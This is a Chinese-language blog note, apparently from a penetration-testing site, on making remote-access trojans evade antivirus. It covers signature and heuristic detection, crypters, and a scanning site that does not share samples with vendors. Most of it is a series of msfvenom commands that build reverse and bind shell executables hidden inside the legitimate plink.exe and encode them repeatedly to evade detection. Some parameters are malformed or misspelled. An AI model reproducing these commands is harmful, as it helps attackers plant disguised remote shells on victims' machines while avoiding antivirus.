RAT免杀技术

RAT

RAT思维导图下载链接

检测原理

基于二进制文件中特征签名的黑名单检测方法

基于行为的分析方法(启发式)

免杀技术

修改二进制文件中的特征字符

  • 替换、擦除、修改

加密技术(crypter)

  • 通过加密使得特征字符不可读,从而逃避AV检测
  • 运行时分片分段的解密执行,注入进程或AV不检查的无害文件中

防病毒软件的检测

  • 恶意程序本身的特征字符
  • 加密器crypter的特征字符

在线多引擎查杀网站与AV厂商共享信息

https://www.virustotal.com/gui/home/upload

http://www.virscan.org/

搞黑的在线多引擎查毒站

https://nodistribute.com/

软件保护

软件开发商为保护版权,采用的混淆和加密技术避免盗版逆向

常被恶意程序软件用于免杀目的

Hyperion(32bit程序加密器)

  • Crypter(加密)
  • Container(解密器+PE Loader)

利用模板(正常程序)隐藏shell

#msfvenom -p(加载) windows/shell_reverse_tcp -x(使用模板) /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4.4.4.4 -a(操作系统架构) x86 --platform(平台) win(windows) -f(输出格式) exe -o(输出) a.exe

#msfvenom -p(加载) windows/shell/bind_tcp -x (模板) /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -e x86/shaikata_ga_nai -i 5 -a x86 --platform win -f exe > b.exe

#strins a.exe(查看可疑程序可读字符串内容)

#md5sum *.exe(查看程序的值)

加密编码反弹shell

#msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f(格式) raw(原始格式) -e(加密) x86/shikata_ga_nai(加密模块) -i(加密次数) 5(五次)

| (管道)msfvenom -a(架构) x86 --platform(平台 ) windows -e(加密) x86/countdown(模块) -i(加密次数) 8(次数) -f(输出格式) raw(原始格式)

|(管道) msfvenom -a(架构) x86 --platform(平台) windows -e(加密) x86/shikata_ga_nai(模块) -i(加密次数) 9 -b(过滤特殊字符) ‘\x00’ -f(输出格式) exe -o(输出) a.exe

生成反弹shell

#msfvenom -p(payload) windows/shell/bind_tcp lhost(对方ip)=1.1.1.1 lport(对方端口)=4444 -a(操作系统架构) x86 --platform(平台) win(windows平台) -f (输出格式)exe -o(输出) a.exe

你可能感兴趣的:(渗透测试,rat,安全漏洞)